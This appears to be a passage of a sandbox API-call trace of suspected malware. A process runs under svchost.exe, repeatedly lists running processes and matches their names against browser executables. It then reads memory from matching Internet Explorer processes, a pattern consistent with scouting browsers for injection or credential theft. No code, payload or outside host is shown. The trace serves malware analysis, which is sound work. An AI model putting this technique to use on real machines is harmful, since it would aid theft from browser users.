	[0212.399] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3d88
	[0212.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.399] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0212.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.400] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.400] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0212.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.401] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.401] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0212.402] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3d8c
	[0212.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.402] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0212.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.402] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0212.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.403] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0212.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.403] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.403] NtQueryInformationProcess (in: ProcessHandle=0x3d8c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0212.403] ReadProcessMemory (in: hProcess=0x3d8c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0212.403] ReadProcessMemory (in: hProcess=0x3d8c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0212.403] ReadProcessMemory (in: hProcess=0x3d8c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0212.404] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0212.404] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0212.404] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3d90
	[0212.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.405] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0212.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.405] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0212.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.405] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0212.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.405] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.406] NtQueryInformationProcess (in: ProcessHandle=0x3d90, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0212.406] ReadProcessMemory (in: hProcess=0x3d90, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0212.406] ReadProcessMemory (in: hProcess=0x3d90, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0212.406] ReadProcessMemory (in: hProcess=0x3d90, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0212.406] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0212.406] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0212.407] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x3d94
	[0212.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.407] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0212.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.407] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.408] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0212.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.408] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.408] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0212.409] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3d98
	[0212.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.409] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0212.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.409] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.410] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0212.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.410] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.411] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.411] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3d9c
	[0212.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.411] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.412] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.412] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.412] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.413] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.413] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.414] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3da0
	[0212.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.414] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.415] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.415] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.415] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.415] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0212.416] CloseHandle (hObject=0x188) returned 1
	[0212.416] Sleep (dwMilliseconds=0x64) 
	[0212.520] GetCurrentProcessId () returned 0x110
	[0212.521] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0212.524] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0212.525] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0212.526] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0212.527] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3da4
	[0212.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.527] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0212.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.528] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.528] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0212.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.528] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.529] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0212.530] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3da8
	[0212.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.530] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0212.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.530] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.531] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0212.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.531] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.531] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0212.532] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3dac
	[0212.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.532] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0212.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.533] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.533] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0212.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.534] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.534] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0212.536] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3db0
	[0212.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.536] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0212.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.536] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.537] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0212.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.537] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.538] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0212.538] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3db4
	[0212.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.539] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0212.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.539] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.540] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0212.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.540] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.540] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0212.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3db8
	[0212.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.542] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0212.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.542] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.543] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0212.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.543] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.543] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0212.544] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3dbc
	[0212.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.545] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0212.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.545] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.545] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0212.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.546] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.546] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0212.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3dc0
	[0212.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.547] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0212.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.548] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.548] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0212.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.548] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.549] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3dc4
	[0212.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.550] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.550] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.551] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.551] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.552] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.553] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3dc8
	[0212.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.553] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.553] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.555] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.555] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.555] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.556] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3dcc
	[0212.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.556] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.557] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.557] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.558] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.558] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.559] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3dd0
	[0212.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.559] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.560] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.560] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.561] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.561] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.562] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3dd4
	[0212.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.562] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.562] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.563] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.563] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.564] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.565] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3dd8
	[0212.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.565] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.565] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.566] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.567] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.567] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.568] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x3ddc
	[0212.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.568] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.568] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.569] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.569] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
